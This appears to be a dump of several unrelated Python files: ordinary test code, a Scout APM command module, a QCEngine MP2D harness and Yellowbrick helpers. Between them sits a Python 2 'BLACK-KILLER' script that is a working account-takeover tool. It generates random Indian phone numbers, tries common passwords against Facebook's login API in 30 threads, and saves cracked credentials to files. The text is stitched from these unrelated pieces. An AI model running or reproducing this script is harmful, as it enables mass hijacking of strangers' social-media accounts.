                         {'name': 'Thao Boê', 'published': False})
    def test_update_set_multiple_values_at_once(self):
        book = SimpleBook(name='Thao Boê', published=False)
        book.update(name='Thao Bɛ', published=True)
        self.assertEqual(book._data_dict,
                         {'name': 'Thao Bɛ', 'published': True})
    def test_update_returns_self_and_is_chained(self):
        book = SimpleBook(name='Thao Boê', published=False)
        book.update(name='C').update(name='P') \
            .update(name='T').update(name='B')
        self.assertEqual(book._data_dict, {'published': False, 'name': 'B'})
    def test_update_does_not_trigger_transform(self):
        # Unlike setters, update stores the raw string without converting it.
        deadline = SimpleDeadline()
        deadline.update(ended_at='2020-02-04')
        self.assertEqual(deadline._data_dict,
                         {'ended_at': '2020-02-04', 'message': None})
    def test_update_sets_back_value_to_none(self):
        deadline = SimpleDeadline()
        deadline.update(ended_at='2020-02-04').update(ended_at=None)
        self.assertEqual(
            deadline._data_dict,
            {'ended_at': None, 'message': None})
    def test_update_does_not_auto_convert_camelcase_keys_into_snakecase(self):
        deadline = SimpleDeadline()
        with self.assertRaises(ValueError):
            deadline.update(**{'endedAt': '2020-02-04'})
    def test_update_raises_if_given_key_is_not_allowed(self):
        deadline = SimpleDeadline()
        with self.assertRaises(ValueError) as context:
            deadline.update(**{'name': 'a', 'value': 'b'})
        # Regex tolerates either ordering of the two offending keys.
        self.assertRegex(str(context.exception),
                         "'(name|value)', '(value|name)' not allowed in "
                         "SimpleDeadline\\.")
| nilq/baby-python | python |
#CYBER NAME BLACK-KILLER
#GITHUB: https://github.com/ShuBhamg0sain
#WHATAPP NO +919557777030
import os
CorrectUsername = "g0sain"
CorrectPassword = "sim"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[#] \x1b[0;36m Enter Username\x1b[1;92m➤ ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[#] \x1b[0;36m Enter Password\x1b[1;92m➤ ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #fb-cloning-id SG
loop = 'false'
else:
print "Wrong password!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
else:
print "Wrong username!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### Dev : ShuBhamg0sain#####
##### LOGO #####
logo='''
\033[1;96m•◈•───────────────•◈•\033[1;92mShuBhamg0sain\033[1;96m•◈•───────────────•◈•
\033[1;97m
\033[1;97m :::!~!!!!!:.
\033[1;97m .xUHWH!! !!?M88WHX:.
\033[1;97m .X*#M@$!! !X!M$$$$$$WWx:.
\033[1;97m :!!!!!!?H! :!$!$$$$$$$$$$8X:
\033[1;97m !!~ ~:~!! :~!$!#$$$$$$$$$$8X:
\033[1;97m :!~::!H!< ~.U$X!?R$$$$$$$$MM!
\033[1;91m ~!~!!!! .: BLACK-KILLER$$$$RMM!
\033[1;97m !:~~~ .:!M"T#$$$$WX??#MRRMMM!
\033[1;97m ~?WuxiW*` `"#$$$$8!!!!??!!!
\033[1;97m :X- M$$$$ `"T#$T~!8$WUXU~
\033[1;97m :%` ~#$$$m: ~!~ ?$$$$$$
\033[1;97m :!`.- ~T$$$$8xx. .xWW- ~""##*"
\033[1;97m..... -~~\033[1;91m:<` ! ~?T#$$@@W@*?$$ /`
\033[1;97mW$@@M!!! .!~~ \033[1;91m!! .:XUW$W!~ `"~: :
\033[1;97m#"~~`.:x%`!! \033[1;91m!H: !WM$$$$Ti.: .!WUn+!`
\033[1;97m:::~:!!`:X~ .:\033[1;92m ?H.!u "$$$B$$$!W:U!T$$M~
\033[1;97m.~~ :X@!.-~ \033[1;92m?@WTWo("*$$$W$TH$! `
\033[1;97mWi.~!X$?!-~ : \033[1;92m?$$$B$Wu("**$RM!
\033[1;97m$R@i.~~ ! : \033[1;92m~$$$$$B$$en:``
\033[1;97m?MXT@Wx.~ : \033[1;92m~"##*$$$$M~
\033[1;47m \033[1;31mShuBhamg0sain \033[1;0m
\x1b[1;93m--------------------------------------------------------------
\x1b[1;92m➣ NAME : Shubhamg0sain
\x1b[1;91m➣ CYBER NAME : BLACK-KILLER
\x1b[1;93m➣ WHATSAPP NO : +919557777030
\x1b[1;95m➣ WARNING : DON,T CALL ME ONLY TEXT
\x1b[1;97m➣ NOTE : USE FAST 4G SIM NET
\x1b[1;93m--------------------------------------------------------------"""
'''
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print "\033[1;92mCYBER_HACKER_GLAXY_R.H.P_1.286-Wellcome"
print
print "\033[1;91mATTACK ON Indian Ids"
print "\033[1;92m[1] starter 919"
print "\033[1;92m[2] starter 918 "
print "\033[1;92m[3] starter 917"
print "\033[1;92m[4] my whatapp group"
print "\033[1;92m[5] my instagram id"
print "\033[1;92m[6] UPDATE SYSTEM"
print "\033[1;92m[0] FOR EXIT"
print 50*'-'
action()
def action():
bch = raw_input('\n ENTER HERE ANY NUMBER ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;95m560, 650, 717, 810, 871, 818, 871, 910, 958, 971, 540, 718, 891, 911, 990, 716"
print "\033[1;95m582, 654, 711, 811, 873, 899, 953, 999, 015, 310, 311, 312, 313, 350, 555"
try:
c = raw_input(" SELECTED CODE: ")
k="+919"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m130, 527, 800, 826, 506, 510, 512, 743, 744, 745, 750, 595, 882, 285, 802"
print "\033[1;95m375, 376, 377, 447, 586, 587, 588, 860, 010, 287, 467, 468, 470, 471"
try:
c = raw_input(" SELECTED CODE: ")
k="+918"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m011, 838, 428, 827"
print "\033[1;95m861, 862, 863, 503"
try:
c = raw_input(" SELECTED CODE: ")
k="+917"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system('xdg-open https://chat.whatsapp.com/JtCW38B01hjAGwlVHhyu5q')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="5":
os.system('xdg-open https://www.instagram.com/shubham_g0sai')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="6":
os.system("clear")
os.system("pip2 install --upgrade balln")
os.system("pip2 install --upgrade balln")
os.system("clear")
print(logo)
print
psb (" Tool has been successfully updated")
time.sleep(2)
os.system("python2 S.py")
# elif chb =='3':
# os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
# time.sleep(1)
# menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('[✓] Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] (for Exit) Press CTRL Then Press z')
time.sleep(0.5)
print 50*'-'
print
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = '786786'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3 = k + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4 = 'india123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass4 = 'india1234'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 S.py')
if __name__ == '__main__':
menu()
| nilq/baby-python | python |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import re
from scout_apm.compat import iteritems
logger = logging.getLogger(__name__)

# Agent keys are expected to be exactly 20 alphanumeric characters; used by
# Register.message() only to log whether the key looks well-formed.
key_regex = re.compile(r"^[a-zA-Z0-9]{20}$")
class Register(object):
    """Command payload registering this agent (app + key + host) with the core agent."""

    __slots__ = ("app", "key", "hostname")

    def __init__(self, app, key, hostname):
        self.app = app
        self.key = key
        # Bug fix: the constructor previously ignored the ``hostname``
        # argument and always stored the hard-coded placeholder
        # "force_set_hostname", making the parameter dead.
        self.hostname = hostname

    def message(self):
        """Return the Register message dict, logging a redacted key summary."""
        # Log only a short prefix and a format-validity flag so the full
        # secret key never reaches the logs.
        key_prefix = self.key[:3]
        key_matches_regex = bool(key_regex.match(self.key))
        logger.info(
            "Registering with app=%s key_prefix=%s key_format_validated=%s host=%s"
            % (self.app, key_prefix, key_matches_regex, self.hostname)
        )
        return {
            "Register": {
                "app": self.app,
                "key": self.key,
                "host": self.hostname,
                "language": "python",
                "api_version": "1.0",
            }
        }
class StartSpan(object):
    """Command marking the start of one span inside a traced request."""

    __slots__ = ("timestamp", "request_id", "span_id", "parent", "operation")

    def __init__(self, timestamp, request_id, span_id, parent, operation):
        self.timestamp = timestamp
        self.request_id = request_id
        self.span_id = span_id
        self.parent = parent
        self.operation = operation

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        # Timestamps go out as ISO-8601 with an explicit "Z" suffix.
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
            "span_id": self.span_id,
            "parent_id": self.parent,
            "operation": self.operation,
        }
        return {"StartSpan": payload}
class StopSpan(object):
    """Command marking the end of a previously started span."""

    __slots__ = ("timestamp", "request_id", "span_id")

    def __init__(self, timestamp, request_id, span_id):
        self.timestamp = timestamp
        self.request_id = request_id
        self.span_id = span_id

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
            "span_id": self.span_id,
        }
        return {"StopSpan": payload}
class StartRequest(object):
    """Command marking the beginning of a tracked request."""

    __slots__ = ("timestamp", "request_id")

    def __init__(self, timestamp, request_id):
        self.timestamp = timestamp
        self.request_id = request_id

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
        }
        return {"StartRequest": payload}
class FinishRequest(object):
    """Command marking the completion of a tracked request."""

    __slots__ = ("timestamp", "request_id")

    def __init__(self, timestamp, request_id):
        self.timestamp = timestamp
        self.request_id = request_id

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
        }
        return {"FinishRequest": payload}
class TagSpan(object):
    """Command attaching a key/value tag to a specific span."""

    __slots__ = ("timestamp", "request_id", "span_id", "tag", "value")

    def __init__(self, timestamp, request_id, span_id, tag, value):
        self.timestamp = timestamp
        self.request_id = request_id
        self.span_id = span_id
        self.tag = tag
        self.value = value

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
            "span_id": self.span_id,
            "tag": self.tag,
            "value": self.value,
        }
        return {"TagSpan": payload}
class TagRequest(object):
    """Command attaching a key/value tag to a whole request."""

    __slots__ = ("timestamp", "request_id", "tag", "value")

    def __init__(self, timestamp, request_id, tag, value):
        self.timestamp = timestamp
        self.request_id = request_id
        self.tag = tag
        self.value = value

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "request_id": self.request_id,
            "tag": self.tag,
            "value": self.value,
        }
        return {"TagRequest": payload}
class ApplicationEvent(object):
    """Command reporting an application-level event (e.g. metadata, metrics)."""

    __slots__ = ("event_type", "event_value", "source", "timestamp")

    def __init__(self, event_type, event_value, source, timestamp):
        self.event_type = event_type
        self.event_value = event_value
        self.source = source
        self.timestamp = timestamp

    def message(self):
        """Serialize to the wire format expected by the core agent."""
        payload = {
            "timestamp": self.timestamp.isoformat() + "Z",
            "event_type": self.event_type,
            "event_value": self.event_value,
            "source": self.source,
        }
        return {"ApplicationEvent": payload}
class BatchCommand(object):
    """Wraps a sequence of commands so they can be sent as one message."""

    __slots__ = ("commands",)

    def __init__(self, commands):
        self.commands = commands

    def message(self):
        """Serialize every wrapped command into a single BatchCommand envelope."""
        serialized = [command.message() for command in self.commands]
        return {"BatchCommand": {"commands": serialized}}

    @classmethod
    def from_tracked_request(cls, request):
        """Build the full command batch for a finished TrackedRequest.

        The TrackedRequest must be finished: start/end times and the
        complete_spans list are all read here.
        """
        commands = [
            StartRequest(timestamp=request.start_time, request_id=request.request_id)
        ]
        # Request-level tags come first, stamped with the request start time.
        for key, value in iteritems(request.tags):
            commands.append(
                TagRequest(
                    timestamp=request.start_time,
                    request_id=request.request_id,
                    tag=key,
                    value=value,
                )
            )
        # Each span expands to Start, its tags, then Stop -- in that order.
        for span in request.complete_spans:
            commands.append(
                StartSpan(
                    timestamp=span.start_time,
                    request_id=span.request_id,
                    span_id=span.span_id,
                    parent=span.parent,
                    operation=span.operation,
                )
            )
            for key, value in iteritems(span.tags):
                commands.append(
                    TagSpan(
                        timestamp=span.start_time,
                        request_id=request.request_id,
                        span_id=span.span_id,
                        tag=key,
                        value=value,
                    )
                )
            commands.append(
                StopSpan(
                    timestamp=span.end_time,
                    request_id=span.request_id,
                    span_id=span.span_id,
                )
            )
        commands.append(
            FinishRequest(timestamp=request.end_time, request_id=request.request_id)
        )
        return cls(commands)
| nilq/baby-python | python |
"""Compute dispersion correction using Greenwell & Beran's MP2D executable."""
import pprint
import re
import sys
from decimal import Decimal
from typing import Any, Dict, Optional, Tuple
import numpy as np
import qcelemental as qcel
from qcelemental.models import AtomicResult, Provenance
from qcelemental.util import safe_version, which
from ..exceptions import InputError, ResourceError, UnknownError
from ..util import execute
from . import empirical_dispersion_resources
from .model import ProgramHarness
pp = pprint.PrettyPrinter(width=120, compact=True, indent=1)
class MP2DHarness(ProgramHarness):
    """Harness that drives the MP2D dispersion-correction executable and
    converts its text output into a QCSchema ``AtomicResult``."""

    # Static capability flags consumed by the ProgramHarness machinery.
    _defaults = {
        "name": "MP2D",
        "scratch": True,
        "thread_safe": True,
        "thread_parallel": False,
        "node_parallel": False,
        "managed_memory": False,
    }

    # Cache of executable path -> version string so `mp2d --version` is
    # only invoked once per process.
    version_cache: Dict[str, str] = {}

    class Config(ProgramHarness.Config):
        pass

    @staticmethod
    def found(raise_error: bool = False) -> bool:
        """Return True when the ``mp2d`` executable is available on PATH."""
        return which(
            "mp2d",
            return_bool=True,
            raise_error=raise_error,
            raise_msg="Please install via `conda install mp2d -c psi4`",
        )

    def get_version(self) -> str:
        """Return (and memoize) the version string reported by ``mp2d --version``."""
        self.found(raise_error=True)

        which_prog = which("mp2d")
        if which_prog not in self.version_cache:
            # Note: anything below v1.1 will return an input error message here. but that's fine as version compare evals to False.
            command = [which_prog, "--version"]
            import subprocess

            proc = subprocess.run(command, stdout=subprocess.PIPE)
            self.version_cache[which_prog] = safe_version(proc.stdout.decode("utf-8").strip())

        return self.version_cache[which_prog]

    def compute(self, input_model: "AtomicInput", config: "TaskConfig") -> "AtomicResult":
        """Run MP2D for *input_model* and return the parsed AtomicResult."""
        from ..testing import is_program_new_enough

        self.found(raise_error=True)

        if not is_program_new_enough("mp2d", "1.1"):
            raise ResourceError(f"MP2D version '{self.get_version()}' too old. Please update to at least '1.1'.")

        job_inputs = self.build_input(input_model, config)
        success, dexe = self.execute(job_inputs)

        if success:
            # Fold the captured streams into the outfiles dict so
            # parse_output sees everything in one mapping.
            dexe["outfiles"]["stdout"] = dexe["stdout"]
            dexe["outfiles"]["stderr"] = dexe["stderr"]
            output_model = self.parse_output(dexe["outfiles"], input_model)
        else:
            # NOTE(review): item assignment on an AtomicInput pydantic model
            # looks suspect -- confirm this failure path is actually exercised.
            output_model = input_model
            output_model["error"] = {"error_type": "execution_error", "error_message": dexe["stderr"]}

        return output_model

    def execute(
        self, inputs: Dict[str, Any], *, extra_outfiles=None, extra_commands=None, scratch_name=None, timeout=None
    ) -> Tuple[bool, Dict]:
        """Run the prepared command in a scratch directory via qcengine's executor."""
        success, dexe = execute(
            inputs["command"],
            inputs["infiles"],
            inputs["outfiles"],
            scratch_messy=False,
            scratch_directory=inputs["scratch_directory"],
        )
        return success, dexe

    def build_input(
        self, input_model: "AtomicInput", config: "TaskConfig", template: Optional[str] = None
    ) -> Dict[str, Any]:
        """Translate an AtomicInput into command line, input files, and scratch info."""
        # strip engine hint
        mtd = input_model.model.method
        if mtd.startswith("mp2d-"):
            mtd = mtd[5:]

        # Only energies and first derivatives are supported.
        if input_model.driver.derivative_int() > 1:
            raise InputError(f"Driver {input_model.driver} not implemented for MP2D.")

        # temp until actual options object
        input_model.extras["info"] = empirical_dispersion_resources.from_arrays(
            name_hint=mtd,
            level_hint=input_model.keywords.get("level_hint", None),
            param_tweaks=input_model.keywords.get("params_tweaks", None),
            dashcoeff_supplement=input_model.keywords.get("dashcoeff_supplement", None),
        )

        # Need 'real' field later and that's only guaranteed for molrec
        molrec = qcel.molparse.from_schema(input_model.molecule.dict())
        xyz = qcel.molparse.to_string(molrec, dtype="xyz", units="Angstrom", ghost_format="")
        infiles = {"mp2d_geometry": xyz}
        # jobrec['molecule']['real'] = molrec['real']

        # env = {
        #     'HOME': os.environ.get('HOME'),
        #     'PATH': os.environ.get('PATH'),
        #     #'PATH': os.pathsep.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(os.pathsep) if x != '']) + \
        #     #        os.pathsep + os.environ.get('PATH'),
        #     #'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH'),
        # }

        # Dispersion parameters are passed on the command line.
        command = ["mp2d", "mp2d_geometry"]
        command.extend(
            """--TT_a1={a1} --TT_a2={a2} --rcut={rcut} --w={w} --s8={s8}""".format(
                **input_model.extras["info"]["dashparams"]
            ).split()
        )
        if input_model.driver == "gradient":
            command.append("--gradient")

        return {
            "command": command,
            "infiles": infiles,
            "outfiles": ["mp2d_gradient"],
            "scratch_directory": config.scratch_directory,
            "input_result": input_model.copy(deep=True),
        }

    def parse_output(self, outfiles: Dict[str, str], input_model: "AtomicInput") -> "AtomicResult":
        """Parse MP2D stdout (and gradient file, if any) into an AtomicResult."""
        stdout = outfiles.pop("stdout")

        for fl, contents in outfiles.items():
            if contents is not None:
                # LOG text += f'\n  MP2D scratch file {fl} has been read.\n'
                pass

        # parse energy output (could go further and break into UCHF, CKS)
        # ``real`` masks ghost atoms; full_nat counts all atoms, real_nat
        # only the non-ghost ones actually sent to MP2D.
        real = np.array(input_model.molecule.real)
        full_nat = real.shape[0]
        real_nat = np.sum(real)

        for ln in stdout.splitlines():
            if re.match(" MP2D dispersion correction Eh", ln):
                ene = Decimal(ln.split()[4])
            elif re.match("Atomic Coordinates in Angstroms", ln):
                break
        else:
            # for/else: reached only when the coordinates marker never appeared;
            # tolerated solely for the single-real-atom gradient corner case.
            if not ((real_nat == 1) and (input_model.driver == "gradient")):
                raise UnknownError("Unknown issue occured.")

        # parse gradient output
        if outfiles["mp2d_gradient"] is not None:
            srealgrad = outfiles["mp2d_gradient"]
            realgrad = np.fromstring(srealgrad, count=3 * real_nat, sep=" ").reshape((-1, 3))

        if input_model.driver == "gradient":
            # Scatter the real-atom gradient back into a full-size (ghosts
            # included) zero-padded array.
            ireal = np.argwhere(real).reshape((-1))
            fullgrad = np.zeros((full_nat, 3))
            try:
                fullgrad[ireal, :] = realgrad
            except NameError as exc:
                # realgrad was never bound because no gradient file was produced.
                raise UnknownError("Unsuccessful gradient collection.") from exc

        qcvkey = input_model.extras["info"]["fctldash"].upper()

        # Accumulate QC variables; the same energy/gradient is published
        # under several conventional names.
        calcinfo = []
        calcinfo.append(qcel.Datum("CURRENT ENERGY", "Eh", ene))
        calcinfo.append(qcel.Datum("DISPERSION CORRECTION ENERGY", "Eh", ene))
        calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION ENERGY", "Eh", ene))
        if qcvkey:
            calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION ENERGY", "Eh", ene))

        if input_model.driver == "gradient":
            calcinfo.append(qcel.Datum("CURRENT GRADIENT", "Eh/a0", fullgrad))
            calcinfo.append(qcel.Datum("DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
            calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
            if qcvkey:
                calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))

        # LOGtext += qcel.datum.print_variables({info.label: info for info in calcinfo})
        calcinfo = {info.label: info.data for info in calcinfo}
        # calcinfo = qcel.util.unnp(calcinfo, flat=True)

        # got to even out who needs plump/flat/Decimal/float/ndarray/list
        # Decimal --> str preserves precision
        calcinfo = {
            k.upper(): str(v) if isinstance(v, Decimal) else v for k, v in qcel.util.unnp(calcinfo, flat=True).items()
        }

        # jobrec['properties'] = {"return_energy": ene}
        # jobrec["molecule"]["real"] = list(jobrec["molecule"]["real"])

        # Pick the datum matching the requested driver as the return value,
        # converting to plain floats/lists for schema friendliness.
        retres = calcinfo[f"CURRENT {input_model.driver.upper()}"]
        if isinstance(retres, Decimal):
            retres = float(retres)
        elif isinstance(retres, np.ndarray):
            retres = retres.ravel().tolist()

        output_data = {
            "extras": input_model.extras,
            "properties": {},
            "provenance": Provenance(
                creator="MP2D", version=self.get_version(), routine=__name__ + "." + sys._getframe().f_code.co_name
            ),
            "return_result": retres,
            "stdout": stdout,
        }
        output_data["extras"]["local_keywords"] = input_model.extras["info"]
        output_data["extras"]["qcvars"] = calcinfo

        output_data["success"] = True
        return AtomicResult(**{**input_model.dict(), **output_data})
| nilq/baby-python | python |
# Re-export the public API of the ``partition`` module; only ``partitionN``
# is advertised via ``__all__``.
__all__ = ["partitionN"]
from partition import *
| nilq/baby-python | python |
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] benjamin@bengfort.com $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
from __future__ import division
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
    """
    Detects the model name for a Scikit-Learn model or pipeline.

    Parameters
    ----------
    model: class or instance
        The object to determine the name for. If the model is an estimator it
        returns the class name; if it is a Pipeline it returns the class name
        of the final transformer or estimator in the Pipeline.

    Returns
    -------
    name : string
        The name of the model or pipeline.
    """
    # Guard clause: refuse anything that is not an estimator at all.
    if not is_estimator(model):
        raise YellowbrickTypeError(
            "Cannot detect the model name for non estimator: '{}'".format(
                type(model)
            )
        )

    # For pipelines, recurse into the final step; otherwise use the class name.
    if isinstance(model, Pipeline):
        return get_model_name(model.steps[-1][-1])
    return model.__class__.__name__
def has_ndarray_int_columns(features, X):
    """Checks if numeric feature columns exist in ndarray.

    Parameters
    ----------
    features : iterable
        Feature identifiers; any strings must be all-digit column indices.

    X : numpy.ndarray
